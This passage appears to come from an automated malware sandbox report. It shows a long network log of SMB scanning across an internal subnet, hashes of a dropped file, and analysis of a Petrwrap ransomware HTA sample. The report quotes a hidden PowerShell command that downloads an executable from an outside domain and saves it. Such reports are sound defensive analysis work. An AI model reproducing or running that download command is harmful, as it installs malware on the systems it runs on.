N/A 10.127.0.141:139 tcp
N/A 10.127.1.26:139 tcp
N/A 10.127.1.27:445 tcp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.143:445 tcp
N/A 10.127.1.27:139 tcp
N/A 10.127.0.142:139 tcp
N/A 10.127.0.143:139 tcp
N/A 10.127.1.28:445 tcp
N/A 10.127.1.28:139 tcp
N/A 10.127.1.29:445 tcp
N/A 10.127.1.29:139 tcp
N/A 10.127.1.30:445 tcp
N/A 10.127.1.30:139 tcp
US 8.8.8.8:53 140.0.127.10.in-addr.arpa udp
N/A 10.127.1.31:445 tcp
N/A 10.127.1.31:139 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.144:139 tcp
US 8.8.8.8:53 141.0.127.10.in-addr.arpa udp
N/A 10.127.1.32:445 tcp
N/A 10.127.1.32:139 tcp
N/A 10.127.0.145:445 tcp
US 8.8.8.8:53 143.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.0.127.10.in-addr.arpa udp
N/A 10.127.0.145:139 tcp
N/A 10.127.1.33:445 tcp
N/A 10.127.1.33:139 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.0.147:445 tcp
N/A 10.127.1.34:445 tcp
N/A 10.127.0.146:139 tcp
N/A 10.127.0.147:139 tcp
N/A 10.127.1.34:139 tcp
N/A 10.127.1.35:445 tcp
N/A 10.127.1.35:139 tcp
N/A 10.127.1.36:445 tcp
N/A 10.127.1.36:139 tcp
N/A 10.127.1.37:445 tcp
US 8.8.8.8:53 144.0.127.10.in-addr.arpa udp
N/A 10.127.1.37:139 tcp
N/A 10.127.1.38:445 tcp
N/A 10.127.0.148:445 tcp
N/A 10.127.1.38:139 tcp
N/A 10.127.0.148:139 tcp
US 8.8.8.8:53 145.0.127.10.in-addr.arpa udp
N/A 10.127.1.39:445 tcp
N/A 10.127.0.149:445 tcp
N/A 10.127.1.39:139 tcp
US 8.8.8.8:53 146.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 147.0.127.10.in-addr.arpa udp
N/A 10.127.0.149:139 tcp
N/A 10.127.1.40:445 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.1.40:139 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.150:139 tcp
N/A 10.127.0.151:139 tcp
N/A 10.127.1.41:445 tcp
N/A 10.127.1.41:139 tcp
N/A 10.127.1.42:445 tcp
N/A 10.127.1.42:139 tcp
N/A 10.127.1.43:445 tcp
N/A 10.127.1.43:139 tcp
SG 20.44.239.154:445 settings-win.data.microsoft.com tcp
US 8.8.8.8:53 148.0.127.10.in-addr.arpa udp
N/A 10.127.1.44:445 tcp
N/A 10.127.1.44:139 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.1.45:445 tcp
US 8.8.8.8:53 149.0.127.10.in-addr.arpa udp
N/A 10.127.0.152:139 tcp
N/A 10.127.1.45:139 tcp
N/A 10.127.0.153:445 tcp
US 8.8.8.8:53 150.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.0.127.10.in-addr.arpa udp
N/A 10.127.1.46:445 tcp
N/A 10.127.0.153:139 tcp
N/A 10.127.1.46:139 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.1.47:445 tcp
N/A 10.127.0.155:445 tcp
N/A 10.127.0.154:445 tcp
N/A 10.127.0.154:139 tcp
N/A 10.127.0.155:139 tcp
N/A 10.127.1.47:139 tcp
N/A 10.127.1.48:445 tcp
N/A 10.127.1.48:139 tcp
N/A 10.127.1.49:445 tcp
N/A 10.127.1.49:139 tcp
N/A 10.127.1.50:445 tcp
DE 136.243.69.123:445 tcp
N/A 10.127.1.50:139 tcp
US 8.8.8.8:53 152.0.127.10.in-addr.arpa udp
N/A 10.127.1.51:445 tcp
N/A 10.127.1.51:139 tcp
N/A 10.127.0.156:445 tcp
US 8.8.8.8:53 153.0.127.10.in-addr.arpa udp
N/A 10.127.0.156:139 tcp
N/A 10.127.1.52:445 tcp
N/A 10.127.1.52:139 tcp
N/A 10.127.0.157:445 tcp
US 8.8.8.8:53 154.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 155.0.127.10.in-addr.arpa udp
N/A 10.127.0.157:139 tcp
N/A 10.127.1.53:445 tcp
N/A 10.127.1.53:139 tcp
US 52.111.227.13:445 nexusrules.officeapps.live.com tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.0.158:139 tcp
N/A 10.127.0.159:139 tcp
N/A 10.127.1.54:445 tcp
N/A 10.127.1.54:139 tcp
N/A 10.127.1.55:445 tcp
N/A 10.127.1.55:139 tcp
N/A 10.127.1.56:445 tcp
N/A 10.127.1.56:139 tcp
N/A 10.127.0.0:445 tcp
N/A 10.127.1.57:445 tcp
US 8.8.8.8:53 156.0.127.10.in-addr.arpa udp
N/A 10.127.1.57:139 tcp
N/A 10.127.0.160:445 tcp
N/A 10.127.1.58:445 tcp
US 8.8.8.8:53 157.0.127.10.in-addr.arpa udp
N/A 10.127.0.160:139 tcp
N/A 10.127.1.58:139 tcp
N/A 10.127.1.59:445 tcp
N/A 10.127.0.161:445 tcp
US 8.8.8.8:53 158.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.0.127.10.in-addr.arpa udp
N/A 10.127.1.59:139 tcp
N/A 10.127.0.161:139 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.1.60:445 tcp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.1.60:139 tcp
N/A 10.127.0.162:139 tcp
N/A 10.127.0.163:139 tcp
N/A 10.127.1.61:445 tcp
N/A 10.127.1.61:139 tcp
N/A 10.127.1.62:445 tcp
N/A 10.127.1.62:139 tcp
N/A 10.127.1.63:445 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.1.63:139 tcp
US 8.8.8.8:53 160.0.127.10.in-addr.arpa udp
N/A 10.127.1.64:445 tcp
N/A 10.127.1.64:139 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.164:139 tcp
N/A 10.127.1.65:445 tcp
US 8.8.8.8:53 161.0.127.10.in-addr.arpa udp
N/A 10.127.1.65:139 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.1.66:445 tcp
US 8.8.8.8:53 162.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 163.0.127.10.in-addr.arpa udp
N/A 10.127.0.165:139 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.1.66:139 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.167:445 tcp
N/A 10.127.1.67:445 tcp
N/A 10.127.0.166:139 tcp
N/A 10.127.0.167:139 tcp
N/A 10.127.1.67:139 tcp
N/A 10.127.1.68:445 tcp
N/A 10.127.1.68:139 tcp
N/A 10.127.1.69:445 tcp
N/A 10.127.1.69:139 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.1.70:445 tcp
US 8.8.8.8:53 164.0.127.10.in-addr.arpa udp
N/A 10.127.1.70:139 tcp
N/A 10.127.1.71:445 tcp
N/A 10.127.0.168:445 tcp
N/A 10.127.1.71:139 tcp
US 8.8.8.8:53 165.0.127.10.in-addr.arpa udp
N/A 10.127.0.168:139 tcp
N/A 10.127.1.72:445 tcp
N/A 10.127.1.72:139 tcp
N/A 10.127.0.169:445 tcp
US 8.8.8.8:53 166.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 167.0.127.10.in-addr.arpa udp
N/A 10.127.0.169:139 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.1.73:445 tcp
N/A 10.127.1.73:139 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.170:139 tcp
N/A 10.127.0.171:139 tcp
N/A 10.127.1.74:445 tcp
N/A 10.127.1.74:139 tcp
N/A 10.127.1.75:445 tcp
N/A 10.127.1.75:139 tcp
N/A 10.127.1.76:445 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.1.76:139 tcp
N/A 10.127.1.77:445 tcp
US 8.8.8.8:53 168.0.127.10.in-addr.arpa udp
N/A 10.127.1.77:139 tcp
N/A 10.127.1.78:445 tcp
N/A 10.127.0.172:445 tcp
US 8.8.8.8:53 169.0.127.10.in-addr.arpa udp
N/A 10.127.0.172:139 tcp
N/A 10.127.1.78:139 tcp
N/A 10.127.1.79:445 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.8:445 tcp
US 8.8.8.8:53 170.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 171.0.127.10.in-addr.arpa udp
N/A 10.127.1.79:139 tcp
N/A 10.127.0.173:139 tcp
N/A 10.127.1.80:445 tcp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.175:445 tcp
N/A 10.127.1.80:139 tcp
N/A 10.127.0.174:139 tcp
N/A 10.127.0.175:139 tcp
N/A 10.127.1.81:445 tcp
N/A 10.127.1.81:139 tcp
N/A 10.127.1.82:445 tcp
N/A 10.127.1.82:139 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.1.83:445 tcp
N/A 10.127.1.83:139 tcp
US 8.8.8.8:53 172.0.127.10.in-addr.arpa udp
N/A 10.127.1.84:445 tcp
N/A 10.127.1.84:139 tcp
N/A 10.127.0.176:445 tcp
N/A 10.127.1.85:445 tcp
N/A 10.127.0.176:139 tcp
US 8.8.8.8:53 173.0.127.10.in-addr.arpa udp
N/A 10.127.1.85:139 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.10:445 tcp
US 8.8.8.8:53 174.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 175.0.127.10.in-addr.arpa udp
N/A 10.127.1.86:445 tcp
N/A 10.127.0.177:139 tcp
N/A 10.127.1.86:139 tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.1.87:445 tcp
N/A 10.127.0.178:139 tcp
N/A 10.127.0.179:139 tcp
N/A 10.127.1.87:139 tcp
N/A 10.127.1.88:445 tcp
N/A 10.127.1.88:139 tcp
N/A 10.127.1.89:445 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.1.89:139 tcp
N/A 10.127.1.90:445 tcp
US 8.8.8.8:53 176.0.127.10.in-addr.arpa udp
N/A 10.127.1.90:139 tcp
N/A 10.127.1.91:445 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.1.91:139 tcp
N/A 10.127.0.180:139 tcp
US 8.8.8.8:53 177.0.127.10.in-addr.arpa udp
N/A 10.127.1.92:445 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.1.92:139 tcp
N/A 10.127.0.181:445 tcp
US 8.8.8.8:53 178.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 179.0.127.10.in-addr.arpa udp
N/A 10.127.0.181:139 tcp
N/A 10.127.1.93:445 tcp
N/A 10.127.1.93:139 tcp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.0.182:139 tcp
N/A 10.127.0.183:139 tcp
N/A 10.127.1.94:445 tcp
N/A 10.127.1.94:139 tcp
N/A 10.127.1.95:445 tcp
N/A 10.127.1.95:139 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.1.96:445 tcp
N/A 10.127.1.96:139 tcp
N/A 10.127.1.97:445 tcp
US 8.8.8.8:53 180.0.127.10.in-addr.arpa udp
N/A 10.127.1.97:139 tcp
N/A 10.127.1.98:445 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.184:139 tcp
N/A 10.127.1.98:139 tcp
US 8.8.8.8:53 181.0.127.10.in-addr.arpa udp
N/A 10.127.0.14:445 tcp
N/A 10.127.1.99:445 tcp
N/A 10.127.0.185:445 tcp
US 8.8.8.8:53 182.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 183.0.127.10.in-addr.arpa udp
N/A 10.127.0.185:139 tcp
N/A 10.127.1.99:139 tcp
N/A 10.127.1.100:445 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.187:445 tcp
N/A 10.127.0.186:139 tcp
N/A 10.127.1.100:139 tcp
N/A 10.127.0.187:139 tcp
N/A 10.127.1.101:445 tcp
N/A 10.127.1.101:139 tcp
N/A 10.127.1.102:445 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.1.102:139 tcp
N/A 10.127.1.103:445 tcp
N/A 10.127.1.103:139 tcp
US 8.8.8.8:53 184.0.127.10.in-addr.arpa udp
N/A 10.127.1.104:445 tcp
N/A 10.127.1.104:139 tcp
N/A 10.127.0.188:445 tcp
N/A 10.127.0.188:139 tcp
N/A 10.127.1.105:445 tcp
US 8.8.8.8:53 185.0.127.10.in-addr.arpa udp
N/A 10.127.0.16:445 tcp
N/A 10.127.1.105:139 tcp
N/A 10.127.0.189:445 tcp
US 8.8.8.8:53 186.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 187.0.127.10.in-addr.arpa udp
N/A 10.127.0.189:139 tcp
N/A 10.127.1.106:445 tcp
N/A 10.127.1.106:139 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.1.107:445 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.190:139 tcp
N/A 10.127.0.191:139 tcp
N/A 10.127.1.107:139 tcp
N/A 10.127.1.108:445 tcp
N/A 10.127.1.108:139 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.1.109:445 tcp
N/A 10.127.1.109:139 tcp
N/A 10.127.1.110:445 tcp
US 8.8.8.8:53 188.0.127.10.in-addr.arpa udp
N/A 10.127.1.110:139 tcp
N/A 10.127.1.111:445 tcp
N/A 10.127.0.192:445 tcp
US 8.8.8.8:53 189.0.127.10.in-addr.arpa udp
N/A 10.127.1.111:139 tcp
N/A 10.127.0.192:139 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.1.112:445 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.1.112:139 tcp
US 8.8.8.8:53 190.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 191.0.127.10.in-addr.arpa udp
N/A 10.127.0.193:139 tcp
N/A 10.127.1.113:445 tcp
N/A 10.127.0.194:445 tcp
N/A 10.127.1.113:139 tcp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.194:139 tcp
N/A 10.127.0.195:139 tcp
N/A 10.127.1.114:445 tcp
N/A 10.127.1.114:139 tcp
N/A 10.127.1.115:445 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.1.115:139 tcp
N/A 10.127.1.116:445 tcp
N/A 10.127.1.116:139 tcp
US 8.8.8.8:53 192.0.127.10.in-addr.arpa udp
N/A 10.127.1.117:445 tcp
N/A 10.127.1.117:139 tcp
N/A 10.127.1.118:445 tcp
US 8.8.8.8:53 193.0.127.10.in-addr.arpa udp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.196:139 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.1.118:139 tcp
N/A 10.127.1.119:445 tcp
N/A 10.127.0.197:445 tcp
US 8.8.8.8:53 194.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 195.0.127.10.in-addr.arpa udp
N/A 10.127.0.197:139 tcp
N/A 10.127.1.119:139 tcp
N/A 10.127.1.120:445 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.0.198:139 tcp
N/A 10.127.1.120:139 tcp
N/A 10.127.0.199:139 tcp
N/A 10.127.1.121:445 tcp
N/A 10.127.1.121:139 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.1.122:445 tcp
N/A 10.127.1.122:139 tcp
N/A 10.127.1.123:445 tcp
N/A 10.127.1.123:139 tcp
N/A 10.127.1.124:445 tcp
N/A 10.127.1.124:139 tcp
N/A 10.127.0.200:445 tcp
US 8.8.8.8:53 197.0.127.10.in-addr.arpa udp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.200:139 tcp
N/A 10.127.1.125:445 tcp
N/A 10.127.1.125:139 tcp
N/A 10.127.0.201:445 tcp
US 8.8.8.8:53 198.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.0.127.10.in-addr.arpa udp
N/A 10.127.0.201:139 tcp
N/A 10.127.1.126:445 tcp
N/A 10.127.1.126:139 tcp
N/A 10.127.0.202:445 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.1.127:445 tcp
N/A 10.127.0.202:139 tcp
N/A 10.127.0.203:139 tcp
N/A 10.127.1.127:139 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.1.128:445 tcp
N/A 10.127.1.128:139 tcp
N/A 10.127.1.129:445 tcp
N/A 10.127.1.129:139 tcp
N/A 10.127.1.130:445 tcp
US 8.8.8.8:53 200.0.127.10.in-addr.arpa udp
N/A 10.127.1.130:139 tcp
N/A 10.127.1.131:445 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.24:445 tcp
US 8.8.8.8:53 201.0.127.10.in-addr.arpa udp
N/A 10.127.0.204:139 tcp
N/A 10.127.1.131:139 tcp
N/A 10.127.1.132:445 tcp
N/A 10.127.0.205:445 tcp
US 8.8.8.8:53 202.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.0.127.10.in-addr.arpa udp
N/A 10.127.1.132:139 tcp
N/A 10.127.0.205:139 tcp
N/A 10.127.1.133:445 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.207:445 tcp
N/A 10.127.1.133:139 tcp
N/A 10.127.0.206:139 tcp
N/A 10.127.0.207:139 tcp
N/A 10.127.1.134:445 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.1.134:139 tcp
N/A 10.127.1.135:445 tcp
N/A 10.127.1.135:139 tcp
N/A 10.127.1.136:445 tcp
N/A 10.127.1.136:139 tcp
US 8.8.8.8:53 204.0.127.10.in-addr.arpa udp
N/A 10.127.1.137:445 tcp
N/A 10.127.1.137:139 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.208:445 tcp
N/A 10.127.0.208:139 tcp
N/A 10.127.1.138:445 tcp
US 8.8.8.8:53 205.0.127.10.in-addr.arpa udp
N/A 10.127.1.138:139 tcp
US 8.8.8.8:53 206.0.127.10.in-addr.arpa udp
N/A 10.127.0.209:445 tcp
N/A 10.127.1.139:445 tcp
US 8.8.8.8:53 207.0.127.10.in-addr.arpa udp
N/A 10.127.0.209:139 tcp
N/A 10.127.1.139:139 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.1.140:445 tcp
N/A 10.127.0.210:139 tcp
N/A 10.127.0.211:139 tcp
N/A 10.127.1.140:139 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.1.141:445 tcp
N/A 10.127.1.141:139 tcp
N/A 10.127.1.142:445 tcp
N/A 10.127.1.142:139 tcp
N/A 10.127.1.143:445 tcp
US 8.8.8.8:53 208.0.127.10.in-addr.arpa udp
N/A 10.127.1.143:139 tcp
N/A 10.127.1.144:445 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.1.144:139 tcp
US 8.8.8.8:53 209.0.127.10.in-addr.arpa udp
N/A 10.127.0.212:445 tcp
N/A 10.127.0.212:139 tcp
N/A 10.127.1.145:445 tcp
N/A 10.127.1.145:139 tcp
N/A 10.127.0.213:445 tcp
US 8.8.8.8:53 211.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.0.127.10.in-addr.arpa udp
N/A 10.127.0.213:139 tcp
N/A 10.127.1.146:445 tcp
N/A 10.127.1.146:139 tcp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.215:445 tcp
N/A 10.127.1.147:445 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.214:139 tcp
N/A 10.127.0.215:139 tcp
N/A 10.127.1.147:139 tcp
N/A 10.127.1.148:445 tcp
N/A 10.127.1.148:139 tcp
N/A 10.127.1.149:445 tcp
N/A 10.127.1.149:139 tcp
US 8.8.8.8:53 212.0.127.10.in-addr.arpa udp
N/A 10.127.1.150:445 tcp
N/A 10.127.1.150:139 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.1.151:445 tcp
N/A 10.127.0.216:445 tcp
US 8.8.8.8:53 213.0.127.10.in-addr.arpa udp
N/A 10.127.0.216:139 tcp
N/A 10.127.1.151:139 tcp
N/A 10.127.1.152:445 tcp
US 8.8.8.8:53 214.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.0.127.10.in-addr.arpa udp
N/A 10.127.0.217:445 tcp
N/A 10.127.1.152:139 tcp
N/A 10.127.0.217:139 tcp
N/A 10.127.1.153:445 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.1.153:139 tcp
N/A 10.127.0.218:139 tcp
N/A 10.127.0.219:139 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.1.154:445 tcp
N/A 10.127.1.154:139 tcp
N/A 10.127.1.155:445 tcp
N/A 10.127.1.155:139 tcp
N/A 10.127.1.156:445 tcp
N/A 10.127.1.156:139 tcp
US 8.8.8.8:53 216.0.127.10.in-addr.arpa udp
N/A 10.127.1.157:445 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.1.157:139 tcp
N/A 10.127.0.220:445 tcp
N/A 10.127.0.220:139 tcp
US 8.8.8.8:53 217.0.127.10.in-addr.arpa udp
N/A 10.127.1.158:445 tcp
N/A 10.127.1.158:139 tcp
N/A 10.127.0.221:445 tcp
US 8.8.8.8:53 218.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.0.127.10.in-addr.arpa udp
N/A 10.127.1.159:445 tcp
N/A 10.127.0.221:139 tcp
N/A 10.127.1.159:139 tcp
N/A 10.127.0.222:445 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.1.160:445 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.222:139 tcp
N/A 10.127.0.223:139 tcp
N/A 10.127.1.160:139 tcp
N/A 10.127.1.161:445 tcp
N/A 10.127.1.161:139 tcp
N/A 10.127.1.162:445 tcp
N/A 10.127.1.162:139 tcp
N/A 10.127.1.163:445 tcp
US 8.8.8.8:53 220.0.127.10.in-addr.arpa udp
N/A 10.127.1.163:139 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.1.164:445 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.1.164:139 tcp
US 8.8.8.8:53 221.0.127.10.in-addr.arpa udp
N/A 10.127.0.224:139 tcp
N/A 10.127.1.165:445 tcp
N/A 10.127.1.165:139 tcp
N/A 10.127.0.225:445 tcp
US 8.8.8.8:53 222.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.0.127.10.in-addr.arpa udp
N/A 10.127.0.225:139 tcp
N/A 10.127.1.166:445 tcp
N/A 10.127.1.166:139 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.227:445 tcp
N/A 10.127.0.226:139 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.227:139 tcp
N/A 10.127.1.167:445 tcp
N/A 10.127.1.167:139 tcp
N/A 10.127.1.168:445 tcp
N/A 10.127.1.168:139 tcp
N/A 10.127.1.169:445 tcp
N/A 10.127.1.169:139 tcp
US 8.8.8.8:53 224.0.127.10.in-addr.arpa udp
N/A 10.127.0.36:445 tcp
N/A 10.127.1.170:445 tcp
N/A 10.127.1.170:139 tcp
N/A 10.127.0.228:445 tcp
N/A 10.127.1.171:445 tcp
US 8.8.8.8:53 225.0.127.10.in-addr.arpa udp
N/A 10.127.0.228:139 tcp
N/A 10.127.1.171:139 tcp
N/A 10.127.1.172:445 tcp
US 8.8.8.8:53 226.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.0.127.10.in-addr.arpa udp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.229:139 tcp
N/A 10.127.1.172:139 tcp
N/A 10.127.1.173:445 tcp
N/A 10.127.0.230:445 tcp
N/A 10.127.0.231:445 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.230:139 tcp
N/A 10.127.1.173:139 tcp
N/A 10.127.0.231:139 tcp
N/A 10.127.1.174:445 tcp
N/A 10.127.1.174:139 tcp
N/A 10.127.1.175:445 tcp
N/A 10.127.1.175:139 tcp
N/A 10.127.1.176:445 tcp
N/A 10.127.1.176:139 tcp
N/A 10.127.0.38:445 tcp
US 8.8.8.8:53 228.0.127.10.in-addr.arpa udp
N/A 10.127.1.177:445 tcp
N/A 10.127.1.177:139 tcp
N/A 10.127.0.232:445 tcp
US 8.8.8.8:53 229.0.127.10.in-addr.arpa udp
N/A 10.127.0.232:139 tcp
N/A 10.127.1.178:445 tcp
N/A 10.127.1.178:139 tcp
N/A 10.127.0.233:445 tcp
US 8.8.8.8:53 230.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.0.127.10.in-addr.arpa udp
N/A 10.127.1.179:445 tcp
N/A 10.127.0.233:139 tcp
N/A 10.127.1.179:139 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.234:445 tcp
N/A 10.127.0.235:445 tcp
N/A 10.127.0.234:139 tcp
N/A 10.127.1.180:445 tcp
N/A 10.127.0.235:139 tcp
N/A 10.127.1.180:139 tcp
N/A 10.127.1.181:445 tcp
N/A 10.127.1.181:139 tcp
N/A 10.127.1.182:445 tcp
N/A 10.127.1.182:139 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.1.183:445 tcp
US 8.8.8.8:53 232.0.127.10.in-addr.arpa udp
N/A 10.127.1.183:139 tcp
N/A 10.127.1.184:445 tcp
N/A 10.127.0.236:445 tcp
N/A 10.127.1.184:139 tcp
N/A 10.127.0.236:139 tcp
US 8.8.8.8:53 233.0.127.10.in-addr.arpa udp
N/A 10.127.1.185:445 tcp
US 8.8.8.8:53 234.0.127.10.in-addr.arpa udp
N/A 10.127.0.237:445 tcp
N/A 10.127.1.185:139 tcp
US 8.8.8.8:53 235.0.127.10.in-addr.arpa udp
N/A 10.127.0.237:139 tcp
N/A 10.127.1.186:445 tcp
N/A 10.127.0.41:445 tcp
N/A 10.127.1.186:139 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.0.239:445 tcp
N/A 10.127.0.238:139 tcp
N/A 10.127.0.239:139 tcp
N/A 10.127.1.187:445 tcp
N/A 10.127.1.187:139 tcp
N/A 10.127.1.188:445 tcp
N/A 10.127.1.188:139 tcp
N/A 10.127.1.189:445 tcp
N/A 10.127.1.189:139 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.1.190:445 tcp
US 8.8.8.8:53 236.0.127.10.in-addr.arpa udp
N/A 10.127.1.190:139 tcp
N/A 10.127.0.240:445 tcp
US 8.8.8.8:53 237.0.127.10.in-addr.arpa udp
N/A 10.127.0.240:139 tcp
N/A 10.127.1.191:445 tcp
N/A 10.127.1.191:139 tcp
N/A 10.127.1.192:445 tcp
US 8.8.8.8:53 239.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 238.0.127.10.in-addr.arpa udp
N/A 10.127.0.241:445 tcp
N/A 10.127.0.241:139 tcp
N/A 10.127.1.192:139 tcp
N/A 10.127.0.43:445 tcp

Files

memory/5072-0-0x00000000023E0000-0x000000000243E000-memory.dmp

memory/5072-8-0x00000000023E0000-0x000000000243E000-memory.dmp

memory/5072-9-0x00000000023E0000-0x000000000243E000-memory.dmp

memory/5072-11-0x00000000023E0000-0x000000000243E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\56AB.tmp

MD5 7e37ab34ecdcc3e77e24522ddfd4852d
SHA1 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf
SHA256 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f
SHA512 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587

memory/5072-22-0x00000000023E0000-0x000000000243E000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240611-en

Max time kernel

1559s

Max time network

1562s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\myguy.hta"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\myguy.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\57618.exe');

Network

Country Destination Domain Proto
US 8.8.8.8:53 french-cooking.com udp
FR 54.36.91.62:80 french-cooking.com tcp

Files

memory/2228-0-0x0000000002860000-0x0000000002880000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240611-en

Max time kernel

1800s

